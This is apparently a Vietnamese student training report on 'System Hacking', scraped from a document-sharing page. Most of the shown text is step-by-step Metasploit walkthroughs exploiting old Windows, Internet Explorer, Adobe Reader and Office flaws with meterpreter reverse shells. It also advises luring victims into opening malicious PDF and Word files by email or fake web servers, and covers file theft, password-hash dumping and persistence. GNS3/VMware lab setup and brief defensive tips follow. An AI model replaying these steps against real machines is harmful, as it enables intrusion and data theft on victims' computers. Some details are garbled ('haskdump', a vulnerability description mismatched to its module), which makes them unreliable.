Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là 
chia sẻ tập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở 
trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống 
mạng để biết được địa chỉ IP các host có trong mạng. 
Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện 
mạng và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) 
được cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào 
có sẵn trên mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung 
cấp, hệ điều hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc 
Huỳnh Minh Trí Page 24
System Hacking 
gói tin hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy 
được trên tất cả các hệ điều hành, và các gói nhị phân chính thức có sẵn cho 
Linux, Windows, và Mac OSX. 
Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công 
cụ quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai 
thác truy cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus. 
Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ 
thống, Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload 
files, thay đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài 
trojan/ backdoor … 
4. Xâm nhập và khai thác Windows XP 
Hacker: 
– Hệ điều hành Back Track 5 
– Địa chỉ IP: 10.10.10.2 
4.1 Khai thác lổ hỏng Ms10-090 
a) Mô tả: 
Lỗi này nằm trong cơ chế thực hiện mã hóa phiên làm việc của ứng dụng 
web ASP.NET, dẫn tới việc kẻ tấn công có thể thăm dò để tìm ra khóa giải mã 
trong một thời gian ngắn. Hiện tại chưa có bản vá chính thức cho lỗi này. 
b) Phần mềm bị ảnh hưởng: 
Tất cả các hệ điều hành dùng các phiên bản IE6 , IE7 và IE8 
c) Cách thự hiện tấn công: 
Huỳnh Minh Trí Page 25
System Hacking 
Khởi động msfconsole tử cửa sổ terminal của BackTrack: 
> msfconsole 
Khai báo lỗ hổng sử dụng và thiết đặt options: 
> search ms10_090 
> use exploit/windows/browser/ms10_090_ie_css_clip 
> show options 
> set srvhost 10.10.10.2 
> set lhost 0.0.0.0 
> set PAYLOAD windows/meterpreter/reverse_tcp 
> exploit 
BackTrack sẽ tạo ra một link chứa mã độc (http://10.10.10.2:80iT1b69v). 
Chỉ cần nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc 
sang máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn 
nhân đó. 
Tiến hành khai thác máy nạn nhân 
> sessions 
>sessions –i 1 
4.2 Khai thác lổ hỏng Ms10-042 
a) Mô tả: 
Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một 
Huỳnh Minh Trí Page 26
System Hacking 
trang web thiết kế đặc biệt bằng cách sử dụng một trình duyệt web hoặc nhấp 
vào một liên kết thiết kế đặc biệt trong một thông báo e-mail. 
b) Phần mềm bị ảnh hưởng: 
Windows XP Service Pack 2 and Windows XP Service Pack 3 
Windows XP Professional x64 Edition Service Pack 2 
Windows Server 2003 Service Pack 2 
Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 
with SP2 for Itanium-based Systems 
c) Cách thực hiện tấn công: 
Khởi động msfconsole tử cửa sổ terminal của BackTrack: 
> msfconsole 
Khai báo lỗ hổng sử dụng và thiết đặt options: 
> search ms10_042 
> use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 
> show options 
> set srvhost 10.10.10.2 
> set lhost 0.0.0.0 
> set PAYLOAD windows/meterpreter/reverse_tcp 
> exploit 
BackTrack sẽ tạo ra một link chứa mã độc (http://10.10.10.2:80). Chỉ cần 
Huỳnh Minh Trí Page 27
System Hacking 
nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang 
máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó. 
Tiến hành khai thác máy nạn nhân 
> sessions 
> sessions –i 1 
4.3 Khai thác lổ hỏng Ms12-004 
a) Mô tả: 
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng mở một tập 
tin phương tiện truyền thông thiết kế đặc biệt. Một kẻ tấn công khai thác thành 
công lỗ hổng có thể lấy được quyền sử dụng giống như người dùng địa phương. 
Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ 
thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với 
người sử dụng quyền hành chính… 
b) Phần mềm bị ảnh hưởng: Windows XP Windows Server 2003 Windows 
Vista Windows Server 2008 Windows 7 Windows Server 2008 R2 
c) Cách thực hiện tấn công 
Khởi động msfconsole tử cửa sổ terminal của BackTrack 
>msfconsole 
Khai báo lỗ hổng sử dụng và thiết đặt options: 
> Search ms12_004 
> use exploit/windows/browser/ms12_004_midi 
Huỳnh Minh Trí Page 28
System Hacking 
> show options 
> set srvhost 10.10.10.2 
> set lhost 0.0.0.0 
> set payload windows/meterpreter/reverse_tcp 
>exploit 
BackTrack sẽ tạo ra một link chứa mã độc (http://10.10.10.2:80). Chỉ cần 
nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang 
máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó. 
Tiến hành khai thác máy nạn nhân 
> sessions 
> sessions –i 1 
4.4 Khai thác lổ hỏng file PDF qua Adobe Reader 9.x 
a) Mô tả: 
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có 
đuôi .pdf và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có 
chứa mã độc đó lên (các bạn có thể tạo một Webserver giả mạo, dụ nạn nhân tải 
file đó về hoặc có thể gửi kèm theo mail, quăng lên các mạng xã hội, các nơi tải 
file…) và máy nạn nhân đang sử dụng AdobeReader 9.x. máy nạn nhân sẽ bị 
“nhiễm độc”. 
b) Phần mềm bị ảnh hưởng: 
Adobe Reader 9.x chạy trên nền Windows XP SP3 
Huỳnh Minh Trí Page 29
System Hacking 
c) Cách thực hiện tấn công: 
Điều kiện: Victim phải cài đặt phần mền Adobe Reader 9.x 
Khởi động msfconsole tử cửa sổ terminal của BackTrack. 
>msfconsole 
Khai báo lỗ hổng sử dụng và thiết đặt options: 
> Search nojs 
> use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 
> show options 
> set filename test.pdf (đây là tên do mình tự đặt với cú pháp *.pdf) 
> set payload windows/meterpreter/reverse_tcp 
> set lhost 0.0.0.0 
> set lport 5555 
>exploit 
Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file pdf có chứa mã 
độc, file sẽ được lưu tại root./msf4/test.pdf 
Tiếp tục thực hiện các bước sau: 
> use multi/handler 
> set payload windows/meterpreter/reverse_tcp 
> set lhost 0.0.0.0 
Huỳnh Minh Trí Page 30
System Hacking 
> set lport 5555 
> exploit 
Tới đây chúng ta bắt đầu gửi file pdf vừa tạo cho máy nạn nhân, khi nạn 
nhân mở file backtrack sẽ gửi mã độc và chiếm được quyền sử dụng máy nạn 
nhân. 
4.5 Khai thác lỗ hỏng Ms12-027 
a) Mô tả: 
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có 
đuôi .doc và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có 
chứa mã độc đó lên (các bạn có thể tạo một web server giả mạo, dụ nạn nhân tải 
file đó về hoặc có thể gửi kèm theo mail, …) 
b) Phần mềm bị ảnh hưởng: Microsoft Office 2003 Microsoft Office 2007 
Microsoft Office 2010 (ngoại trừ phiên bản x64-based editions) Microsoft 
SQL Server 2000 Analysis Services 
Microsoft SQL Server 2000 (ngoại trừ phiên bản Itanium-based editions) 
Microsoft SQL Server 2005 (đối với Microsoft SQL Server 2005 Express 
Edition chỉ thực hiện được trên Advanced Services) 
Microsoft SQL Server 2008 Microsoft SQL Server 2008 R2 Microsoft 
BizTalk Server 2002 Microsoft Commerce Server 2002 Microsoft Commerce 
Server 2007 Microsoft Commerce Server 2009 Microsoft Commerce Server 2009 
R2 Microsoft Visual FoxPro 8.0 Microsoft Visual FoxPro 9.0 Visual Basic 6.0 
Runtime… 
Huỳnh Minh Trí Page 31
System Hacking 
c) Cách thực hiện tấn công: 
Điều kiện: Victim phải cài đặt phần mềm Microsoft Office Word 2007 Khởi 
động msfconsole tử cửa sổ terminal của BackTrack. 
> msfconsole 
Khai báo lỗ hổng sử dụng và thiết đặt options: 
> search ms12_027 
> use exploit/windows/fileformat/ms12_027_mscomctl_bof 
> show options 
> set filename test.doc (đây là tên do mình tự đặt với cú pháp *.pdf) 
> set payload windows/meterpreter/reverse_tcp 
> set lhost 0.0.0.0 
> set lport 5555 
> exploit 
Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file word có chứa 
mã độc, file sẽ được lưu tại root./msf4/test.doc 
Tiếp tục thực hiện các bước sau: 
> use exploit/multi/handler 
>set payload /windows/meterpreter/reverse_tcp 
> set lhost 0.0.0.0 
> exploit 
Huỳnh Minh Trí Page 32
System Hacking 
Sau khi thực hiện các bước trên, chúng ta bắt đầu gửi file word qua cho 
máy nạn nhân, khi nạn nhân mở file word backtrack sẽ tự động gửi mã độc qua 
và chúng ta có thể chiếm quyền sử dụng máy nạn nhân 
4.6 Khai thác thông tin sau khi đã tấn công: 
Xem thông tin hệ thống: 
> getuid 
> sysinfo 
Tải lên và đánh cắp tài liệu 
– Tải file abc.txt tại Desktop của Back Track lên ổ C của XP 
> upload /root/Desktop/abc.txt C:/ 
– Đánh cắp file xyz.txt tại ổ C của XP và đem về Desktop của Back Track 
> download C:/xyz.txt /root/Desktop 
Lấy hashpass: 
> haskdump 
Khám phá ổ đĩa: 
meterpreter> shell 
– Chuyển dấu nhắc sang ổ đĩa C: 
> cd c: 
– Liệt kê tài nguyên trong ổ C: 
> dir 
Huỳnh Minh Trí Page 33
System Hacking 
– Tạo thư mục abc trong ổ C: 
> md abc 
– Xóa thư mục abc trong ổ C: 
> rd abc 
– Xóa file abc.txt trong ổ C: 
> del abc.txt 
– Trở về meterpreter: 
> exit 
Giữ kết nối với Victim khi Victim mất mạng hay khởi động lại tại port 5555 
> run persistence -A -S -U -X -i 1500 -P 5555 
Huỳnh Minh Trí Page 34
System Hacking 
PHẦN 4 : GNS3 VÀ MÔ PHỎNG HỆ THỐNG ĐƯỜNG 
MẠNG INTERNET 
1. GNS3 là gì? 
GNS3 là 1 chương trình giả lập mạng có giao diện đồ họa cho phép bạn có 
thể giả lập các loại router Cisco sử dụng IOS (hệ điều hành của router) thật, 
ngoài ra còn có thể giả lập các thiết bị mạng khác như ATM, Frame Relay, 
Ethernet Switch, Pix Firewall… và đặt biệt có thể kết nối vào hệ thống mạng thật 
và sử dụng như thiết bị thật. 
GNS3 được phát triển dựa trên Dynamips và Dynagen để mô phỏng các 
dòng router 1700, 2600, 3600, 3700, 7200 có thể sử để triển khai các bài lab của 
CCNA,CCNP,CCIE nhưng hiện tại vẫn chưa mô phỏng Catalyst Switch. 
Ngoài ra, GNS3 còn có chức năng liên kết máy ảo với VMWare và kết nối 
Internet để thực hiện mô phỏng các sơ đồ mạng thực tế. 
2.Mô phỏng mạng Internet để tấn công từ máy Backtrack tới máy XP: 
Mô hình mạng mô phỏng: 
Nhà Hacker: máy Backtrack nối với R1: 10.10.10.0/30 
Nhà Victim: máy win XP nối với R2: 10.10.10.12/30 
Mạng Internet: router ISP nối với R1: 10.10.10.4/30, R2: 10.10.10.8/30 và 
kết nối ra Internet: 203.164.4.2/24 
Huỳnh Minh Trí Page 35
System Hacking 
Cấu hình: 
R1: conf t 
int fa 0/0 
ip add 10.10.10.1 255.255.255.252 
ip nat inside 
int s 0/0 
ip add 10.10.10.5 255.255.255.252 
ip nat outside 
exit 
access-list 1 permit 10.10.10.0 0.0.0.3 
ip nat inside source list 1 int s 0/0 overload 
ip nat inside source static tcp 10.10.10.2 3389 10.10.10.5 3389 
ip nat inside source static tcp 10.10.10.2 4444 10.10.10.5 4444 
Huỳnh Minh Trí Page 36
System Hacking 
ip nat inside source static tcp 10.10.10.2 5555 10.10.10.5 5555 
ip nat inside source static tcp 10.10.10.2 80 10.10.10.5 80 
ip nat inside source static tcp 10.10.10.2 8080 10.10.10.5 8080 
router ei 1 
no auto 
network 10.0.0.0 
passive-interface fa 0/0 
router eigrp 1 
network 10.10.10.4 0.0.0.3 
no auto-summary 
R2: conf t 
int fa 0/0 
ip add 10.10.10.13 255.255.255.252 
ip nat inside 
int s 0/1 
ip add 10.10.10.10 255.255.255.252 
ip nat outside 
exit 
access-list 1 permit 10.10.10.12 0.0.0.3 
ip nat inside source list 1 int s 0/1 overload 
router ei 1 
no auto 
network 10.10.10.12 0.0.0.3 
Huỳnh Minh Trí Page 37
System Hacking 
network 10.10.10.8 0.0.0.3 
ISP: conf t 
int s 0/0 
ip add 10.10.10.6 255.255.255.252 
int s 0/1 
ip add 10.10.10.9 255.255.255.252 
int f 0/0 
ip add 203.162.4.2 255.255.255.252 
router eigrp 1 
no auto 
network 10.10.10.8 0.0.0.3 
network 10.10.10.12 0.0.0.3 
ip route 203.162.4.0 255.255.255.0 203.162.4.1 
ip route 0.0.0.0 0.0.0.0 203.162.4.1 
Sau khi cấu hình xong máy Backtrack và XP có thể ping được ra Internet 
nhưng không thể ping được lẫn nhau. 
Với mô hình này chúng ta có thể xem như đây là 2 đường mạng riêng biệt 
không biết địa chỉ của nhau như đường mạng Internet thực tế. 
Ta tiếp tục thực hiện tấn công từ máy Backtrack tới máy win XP. 
Huỳnh Minh Trí Page 38
System Hacking 
PHẦN 5: TỔNG KẾT 
Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá 
trình sử dụng máy tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp 
nhằm giảm thiểu và phòng tránh việc Hacker đánh cắp Mật khẩu như sau: 
– Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ 
hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò ra. 
– Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được 
băm và lưu dưới dạng NTLM để các chương trình khó khăn để dò tìm 
– Người dùng admin nên xóa tập tin sam trong thư mục Windows/repair 
sau mỗi lần backup dữ liệu bằng rdisk. 
Trong quá trình sử dụng máy tính để truy cập Internet, cần lưu ý: 
– Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng 
hoặc không tin cậy. 
– Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của 
mình. 
– Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm 
bảo mật của bạn có chức năng cập nhật "live" (tự động cập nhật trực tuyến). 
– Cài đặt phần mềm diệt virut Internet Security. 
– Luôn sử dụng các bản Office có bản quyền để luôn được cập nhật v á lỗi 
và hỗ trợ kỹ thuật từ nhà cung cấp. 
Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà 
quản trị cũng như người dùng có kinh nghiệm có thể phân tích chiếc máy tính 
Huỳnh Minh Trí Page 39
System Hacking 
của mình xem liệu nó có đang bị xâm phạm hay không. Một khi nghi ngờ máy 
tính của mình bị xâm nhập, người dùng có thể sử dụng các công cụ này để tự 
kiểm tra máy tính của mình khi có những biểu hiện đáng ngờ: WMIC, Lệnh net, 
Openfiles, Netstat, Find. 
PHỤ LỤC: HƯỚNG DẪN CÀI ĐẶT MỘT SỐ PHẦN MỀM 
1. Cài đặt VMware 
Đầu tiên các bạn vào địa chỉ http://www.vmware.com để tải Vmware phiên 
bản mới nhất về cũng như là đăng ký bản quyền cho Vmware. 
Tiếp đó các bạn mở file cài đặt Vmware đã được tải về. 
Chương trình cài đặt sẽ bắt đầu sau khi load xong một số file quan trọng 
Huỳnh Minh Trí Page 40
System Hacking 
Chọn Next 
Có 2 lựa chọn cho quá trình cài đặt: Typical hoặc Custom 
Huỳnh Minh Trí Page 41
System Hacking 
– Typical: chọn nơi sẽ cài đặt và chọn Next để tiếp tục 
Huỳnh Minh Trí Page 42
System Hacking 
– Custom: chọn các gói cài đặt thêm; nếu chọn gói debug Eclipse thì phải 
chọn cả 2 gói Java và C nếu không chương trình sẽ báo lỗi -> Chọn Next để tiếp 
tục 
Huỳnh Minh Trí Page 43
System Hacking 
Lựa chọn nơi chương trình sẽ tạo shortcut -> Chọn Next 
Chọn Continue để bắt đầu cài đặt 
Huỳnh Minh Trí Page 44
System Hacking 
Quá trình cài đặt bắt đầu … quá trình này có thể kéo dài từ 5′~10′ 
Huỳnh Minh Trí Page 45
System Hacking 
Cài đặt hoàn tất chương trình sẽ yêu cầu đăng ký bản quyền, Chọn Next 
hoặc các bạn có thể bỏ qua bước này bằng cách Chọn Skip 
Kết thúc quá trình VMW7 sẽ yêu cầu khởi động lại máy tính. Có thể kô cần 
khởi động lại mà vẫn có thể khởi động được chương trình 
Huỳnh Minh Trí Page 46
System Hacking 
Trong lần khởi động đầu tiên VMW sẽ muốn bạn xác nhận lại là có muốn sử 
dụng chương trình hay kô! Nếu có chọn Yes -> Chọn OK để xác nhận 
Đây là giao diện làm việc chính của chương trình 
Huỳnh Minh Trí Page 47
System Hacking 
2. Cài đặt máy ảo bằng VMware: 
Sau khi tải về và cài đặt trên máy tính bạn khởi động chương trình VMware 
bằng cách chọn đúp vào biểu tượng ngoài màn hình Desktop, và làm theo các 
bước sau: 
Từ màn hình chính bạn chọn Menu File > New > Virtual Machine… hoặc 
Ctrl+ N 
Huỳnh Minh Trí Page 48
System Hacking 
Chọn Next 
Bạn chọn Typical để cài mặc định sau đó Chọn Next 
Huỳnh Minh Trí Page 49
System Hacking 
Phần mềm hỗ trợ cho bạn rất nhiều hệ điều hành từ Windows đến Linux 
hoặc Sun Solaris... Bạn chọn hệ điều hành và phiên bản rồi Chọn Next để 
tiếp tục 
Ở đây tôi chọn cài hệ điều hành Windows XP 64 bít, bạn cũng có thể thay 
đổi thư mục lưu trữ tại Location, rồi Chọn Next để tiếp tục 
Huỳnh Minh Trí Page 50
System Hacking 
Tại đây bạn nên chọn Use Brided Networking để cải đặt cho Card mạng 
của mình và Chọn Next để tiếp tục 
Tại đây bạn có thể thay đổi giá trị của ổ cứng trên máy ảo (Mặc định là 8Gb) và 
Huỳnh Minh Trí Page 51
System Hacking 
Chọn Finish để kết thúc quá trình lựa chọn cấu hình máy ảo. 
Như vậy là quá trình lựa chọn cấu hình máy ảo kết thúc 
Huỳnh Minh Trí Page 52
System Hacking 
Bạn cũng có thể thay đổi các thông số như dung lượng RAM, dương lượng ổ 
cứng ngay tại đây. 
Để thiết lập ổ CD-ROM cho máy ảo phục vụ cho cài đặt hệ điều hành bạn 
Chọn đúp vào ổ CD-ROM. 
– Nếu bạn muốn cài từ đĩa CD/DVD thì bạn tích chọn User phisical 
Driver và chọn Auto Detect 
– Nếu muốn cài từ file ISO có trong máy bạn tích chọn Use ISO image và 
tìm đến file ISO trên máy của bạn 
Huỳnh Minh Trí Page 53
System Hacking 
Sau khi hoàn tất, để cài máy ảo bạn Chọn "Start this Vitual Machine" 
Và bạn thực hiện cài bình thường như cài cho máy thật. 
3. Cài đặt GNS3: 
GNS3 có thể chạy trên Windows,Linux và Mac OSX.Để cài đặt phần mềm 
trên Window dễ dàng chúng ta có thể sử dụng bộ cài đặt all-in-one cung cấp mọi 
thứ bạn cần để chạy được GNS3. 
Các bạn chọn file GNS3.exe trong phần thầy giáo gửi. 
Tiến hành cài đặt 
Huỳnh Minh Trí Page 54
System Hacking 
Huỳnh Minh Trí Page 55
System Hacking 
Huỳnh Minh Trí Page 56
System Hacking 
Huỳnh Minh Trí Page 57
System Hacking 
Giao diện GNS3 sau khi cài đặt xong 
3. Cấu hình cho GNS3: 
Vào Edit > Add IOS images and hypervisors chỉ đường dẫn đến các file IOS 
trong mục Setting 
Huỳnh Minh Trí Page 58
System Hacking 
Các bạn vào phần Image file: vào chọn đường dẫn tới phần tài liệu của thầy 
giáo gửi có đính kèm file :c2691-adventerprisek9-mz.124-25c.bin 
Huỳnh Minh Trí Page 59
System Hacking 
Sau khi chọn đường dẫn xong các bạn nhấn Save. 
Vào Edit > Preferences > Dynamips > Trong mục Excutable Path chọn 
đường dẫn đến tập tin dynamip-wxp.exe trong thư mục cài đặt GNS3 , sau đó 
bấm vào nút Test để kiểm tra lại hoạt động của Dynamip. 
Huỳnh Minh Trí Page 60
System Hacking 
Huỳnh Minh Trí Page 61
System Hacking 
Nhấn ok. 
Kéo thả các router đã có IOS vào để triển khai 1 mô hình đơn giản. 
Huỳnh Minh Trí Page 62
System Hacking 
CÁC CLIP HƯỚNG DẪN 
https://www.youtube.com/watch?v=V_l_JNnH2GU&list=UUc8- 
uuS3IRvbEk1EOjrVYEQ 
https://www.youtube.com/watch?v=wU-l1dO5ZqE&index=2&list=UUc8- 
uuS3IRvbEk1EOjrVYEQ 
https://www.youtube.com/watch?v=fasOuWKRnx0&list=UUc8- 
uuS3IRvbEk1EOjrVYEQ&index=9 
https://www.youtube.com/watch?v=fQ5qC4E11Do&list=UUc8- 
uuS3IRvbEk1EOjrVYEQ 
https://www.youtube.com/watch?v=5liS6E1ge90&list=UUc8- 
uuS3IRvbEk1EOjrVYEQ&index=2 
https://www.youtube.com/watch?v=INkaadmMras&list=UUc8- 
uuS3IRvbEk1EOjrVYEQ&index=3 
https://www.youtube.com/watch?v=6ADhFh7f0h8&index=4&list=UUc8- 
uuS3IRvbEk1EOjrVYEQ 
Huỳnh Minh Trí Page 63
System Hacking 
DANH MỤC TÀI LIỆU THAM KHẢO 
http://suamaytinhtainha.info/thu-thuat-may-tinh/cach-hack-may- 
tinh-trong-mang-lan-bang-backtrack-5.html 
https://www.mediafire.com/folder/laq7hirml1w5g/Athena- 
TaiLieu 
http://athena.edu.vn/video/an-ninh-mang 
Huỳnh Minh Trí Page 64

More Related Content

What's hot

Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
Phạm Trung Đức
 
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
nataliej4
 
Bai giang atbmtt
Bai giang atbmtt Bai giang atbmtt
Bai giang atbmtt Hà Vũ
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
MasterCode.vn
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongVu Trung Kien
 
200 đề tài luận văn thạc sĩ an ninh mạng. HAY
200 đề tài luận văn thạc sĩ an ninh mạng. HAY200 đề tài luận văn thạc sĩ an ninh mạng. HAY
200 đề tài luận văn thạc sĩ an ninh mạng. HAY
Dịch vụ viết thuê Khóa Luận - ZALO 0932091562
 
Báo cáo phân tích thiết kế mạng
Báo cáo phân tích thiết kế mạngBáo cáo phân tích thiết kế mạng
Báo cáo phân tích thiết kế mạng
jackjohn45
 
Tổng quan về an toàn và bảo mật thông tin
Tổng quan về an toàn và bảo mật thông tinTổng quan về an toàn và bảo mật thông tin
Tổng quan về an toàn và bảo mật thông tin
Nguyen Thi Lan Phuong
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Thịt Xốt Cà Chua
 
Đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đ
Đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đĐề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đ
Đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đ
Dịch vụ viết bài trọn gói ZALO: 0909232620
 
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạngĐề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Dịch vụ viết bài trọn gói ZALO: 0909232620
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Loc Tran
 
luan van thac si phat hien lo hong bao mat trong mang lan
luan van thac si phat hien lo hong bao mat trong mang lanluan van thac si phat hien lo hong bao mat trong mang lan
luan van thac si phat hien lo hong bao mat trong mang lan
Dịch vụ viết thuê Luận Văn - ZALO 0932091562
 
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPTBài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
MasterCode.vn
 
Xây Dựng Mạng LAN
Xây Dựng Mạng LANXây Dựng Mạng LAN
Xây Dựng Mạng LAN
Lại Thanh Tú
 
Kịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort idsKịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort ids
Linh Hoang
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...Danh Tran
 
Gns3
Gns3Gns3
Bài giảng ký thuật theo dõi giám sát mạng PTIT
Bài giảng ký thuật theo dõi giám sát mạng PTITBài giảng ký thuật theo dõi giám sát mạng PTIT
Bài giảng ký thuật theo dõi giám sát mạng PTIT
NguynMinh294
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậpLuc Cao
 

What's hot (20)

Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
 
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
 
Bai giang atbmtt
Bai giang atbmtt Bai giang atbmtt
Bai giang atbmtt
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chong
 
200 đề tài luận văn thạc sĩ an ninh mạng. HAY
200 đề tài luận văn thạc sĩ an ninh mạng. HAY200 đề tài luận văn thạc sĩ an ninh mạng. HAY
200 đề tài luận văn thạc sĩ an ninh mạng. HAY
 
Báo cáo phân tích thiết kế mạng
Báo cáo phân tích thiết kế mạngBáo cáo phân tích thiết kế mạng
Báo cáo phân tích thiết kế mạng
 
Tổng quan về an toàn và bảo mật thông tin
Tổng quan về an toàn và bảo mật thông tinTổng quan về an toàn và bảo mật thông tin
Tổng quan về an toàn và bảo mật thông tin
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
 
Đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đ
Đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đĐề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đ
Đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đ
 
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạngĐề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
